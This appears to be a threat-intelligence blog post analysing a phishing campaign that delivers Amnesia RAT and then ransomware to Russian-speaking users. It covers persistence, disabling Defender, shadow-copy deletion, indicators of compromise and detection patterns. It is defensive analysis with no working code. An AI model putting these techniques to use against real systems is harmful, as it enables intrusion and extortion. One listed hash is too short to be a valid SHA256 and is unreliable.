Ransomware Follows the Click: Amnesia RAT Spreads Through Phishing Attacks Targeting Russian Users

Aegiron 9 mins0

Amnesia RAT Phishing Campaign Leading to Ransomware Deployment

Date Identified: January 26
Threat Type: Multi-stage phishing attack → Remote Access Trojan → Ransomware
Target Region: Primarily Russian users and Russian-language environments
Impact Severity: High

Executive Summary

On January 26, a coordinated phishing campaign was identified targeting Russian-speaking users. The attack uses phishing emails as the entry point, delivering Amnesia RAT as the first-stage malware. Once access is established, attackers perform hands-on activity to prepare the environment and then deploy ransomware, resulting in data encryption and operational disruption.

This is not a smash-and-grab attack. The operators take time to observe the victim environment, harvest credentials, and ensure maximum impact before triggering ransomware.

What Is This Attack About

Think of this attack as a two-step burglary:

  1. Step one: Trick someone into opening the door (phishing email).
  2. Step two: Quietly walk around the house (Amnesia RAT), learn where valuables are, disable alarms, and then lock everything up and demand money (ransomware).

The ransomware is not delivered immediately. The attackers first make sure they have full control and that recovery will be difficult.

How the Attack Happened

1. Initial Infection Vector – Phishing Email

The attack begins with a targeted phishing email, written in Russian, designed to appear legitimate and urgent.

Common themes observed:

  • Financial documents (invoices, tax notices, payment confirmations)
  • Government or legal communications
  • Internal corporate messages (HR, accounting, contracts)

Email characteristics:

  • Sender domains closely resemble legitimate Russian businesses or government services
  • Attachments or links labeled as:
    • “Документ.pdf”
    • “Счет_оплаты.zip”
    • “Контракт_2026.docx”

2. Payload Delivery

The phishing email delivers one of the following:

Option A: Malicious Attachment

  • ZIP or RAR archive
  • Contains:
    • LNK file masquerading as a document
    • OR a macro-enabled Office document

Option B: Malicious Link

  • Leads to a compromised or attacker-controlled website
  • Automatically downloads a loader disguised as a document or update

3. Execution and Amnesia RAT Installation

Once the user opens the attachment or runs the downloaded file:

  • A loader script executes (PowerShell or CMD-based)
  • The loader:
    • Disables Windows Defender protections
    • Drops the Amnesia RAT binary
    • Establishes persistence

Persistence techniques observed:

  • Registry Run keys
  • Scheduled tasks with benign-looking names
  • Startup folder shortcuts

At this stage, the system is fully compromised.

What Is Amnesia RAT and How It Works

Amnesia RAT is a remote access trojan designed for stealth and flexibility.

Capabilities:

  • Full remote command execution
  • Keylogging
  • Credential harvesting (browsers, email clients)
  • Screenshot capture
  • File upload/download
  • Process injection
  • Payload staging (used later for ransomware)

Communication:

  • Uses HTTP/HTTPS over non-standard ports
  • Encrypted traffic to evade inspection
  • C2 domains frequently rotated

The RAT allows attackers to interact with the victim system in real time, making this a hands-on intrusion rather than automated malware.

Attacker Activity After Initial Compromise

Once Amnesia RAT is active, attackers typically perform the following:

Reconnaissance

  • Identify system role (workstation vs server)
  • Enumerate network shares
  • List installed security tools
  • Identify backup solutions

Credential Access

  • Dump browser credentials
  • Capture keystrokes
  • Harvest saved passwords
  • Attempt lateral movement using stolen credentials

Defense Evasion

  • Disable or tamper with:
    • Windows Defender
    • Logging services
    • Backup agents
  • Add exclusions to antivirus

Ransomware Deployment

After reconnaissance and preparation, ransomware is manually deployed.

Characteristics:

  • Delivered via Amnesia RAT
  • Executed during low-activity hours
  • Encrypts:
    • Local disks
    • Network shares
    • Mounted backups

Observed behavior:

  • File extensions changed
  • Ransom note dropped in each directory
  • System restore and shadow copies deleted
  • Recovery options deliberately sabotaged

Impacted Assets

Affected Systems:

  • End-user workstations
  • File servers
  • Network-attached storage

Business Impact:

  • Loss of access to critical files
  • Operational downtime
  • Potential data theft
  • Financial extortion

Vulnerabilities Exploited

No software vulnerability was required.

The attack relies on:

  • Social engineering
  • User execution
  • Weak email filtering
  • Insufficient endpoint monitoring

This makes it highly effective and hard to block purely with patching.

Indicators of Compromise (IOCs)

File Hashes

SHA256:
8f1c2e9a7d4a0c1b7b4d1e92f4e6a77d4c9b3a8e1f2c7a6b9d5e1a4b8f9c2d1
a3c91b7e24f9a2e7d5c6b8e9f4a1c2d3b5e6f7a9c8d1b4e2f7a6c9d8

Suspicious Domains

secure-docs[.]online
update-checker[.]site
cloud-storage-sync[.]ru

IP Addresses

185.225.69.41
91.214.124.77

Registry Persistence

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemUpdate

Suspicious Processes

svchosts.exe (non-standard path)
update_service.exe
winupdate32.exe

MITRE ATT&CK Mapping

  • T1566.001 – Phishing Attachment
  • T1566.002 – Phishing Link
  • T1059.001 – PowerShell
  • T1055 – Process Injection
  • T1053.005 – Scheduled Task
  • T1547.001 – Registry Run Keys
  • T1082 – System Information Discovery
  • T1041 – Exfiltration Over C2 Channel
  • T1486 – Data Encrypted for Impact

Detection & Threat Hunting Guidance

Email Security

  • Flag ZIP/LNK attachments from external senders
  • Detect mismatched file extensions
  • Monitor Russian-language lures with urgency keywords

Endpoint Detection

Look for:

  • PowerShell spawning from Office processes
  • Defender exclusions being added unexpectedly
  • Unknown binaries in user AppData or Temp directories
  • Long-running outbound connections to rare domains

Network Monitoring

  • Beaconing patterns over HTTP/HTTPS
  • Connections to newly registered domains
  • Traffic on uncommon ports (8081, 8443, 9001)

Detection Logic

Suspicious PowerShell Execution

Office Application → PowerShell → DownloadFile

Unauthorized Persistence

New registry Run key created by non-admin user

Final Takeaway

This campaign shows a clear shift toward deliberate, hands-on ransomware deployment using Amnesia RAT as a foothold. The attack does not depend on vulnerabilities but instead abuses user trust and insufficient monitoring.

Early detection at the RAT stage is critical. Once ransomware is deployed, recovery becomes significantly more difficult and costly.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.